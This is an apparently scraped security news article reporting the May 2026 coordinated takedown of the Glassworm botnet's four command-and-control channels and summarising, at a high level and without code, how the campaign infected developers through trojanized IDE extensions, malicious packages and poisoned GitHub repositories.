How cybersecurity firms took down Glassworm botnet in one shot
How cybersecurity firms took down Glassworm botnet in one shot
Publish Date: 2026-05-27 08:11:00
Source Domain: securityaffairs.com
How cybersecurity firms took down Glassworm botnet in one shot
Pierluigi Paganini
May 27, 2026
Glassworm infected developers through poisoned tools and packages until a coordinated takedown killed all four of its C2 channels at once.
On May 26, 2026, at 14:00 UTC, CrowdStrike Counter Adversary Operations team, working with Google and the Shadowserver Foundation, killed all four command-and-control channels of the Glassworm botnet at the same time. The timing was the whole point.
Glassworm has been targeting software developers since at least early 2025. That’s a deliberate choice. Developers have access to source code, cloud credentials, CI/CD pipelines, and package registries. Compromise one developer’s machine and you potentially own everything downstream that developer has ever touched.
The GlassWorm campaign, active since 2025, has evolved from malicious npm packages to large-scale supply chain attacks across GitHub, npm, and VS Code, even deploying RATs via fake browser extensions.
In its latest iteration, threat actors used a malicious OpenVSX extension impersonating WakaTime, bundling a Zig-compiled binary. Instead of acting as the payload, the binary serves as a stealthy dropper that infects multiple IDEs on a system, showing the group’s continuous adapt
The operators ran three parallel infection campaigns. Trojanized VS Code extensions published to the OpenVSX marketplace posed as legitimate tools like time trackers and code formatters, targeting not just VS Code but also Cursor, Windsurf, VSCodium, and others. Malicious npm and Python packages executed harmful code silently during routine dependency installation. And more than 300 GitHub repositories were poisoned using developer credentials stolen from earlier Glassworm infections, with malicious code force-pushed into default branches. Not bad for a group that apparently had nothing better to do for over a…
Source
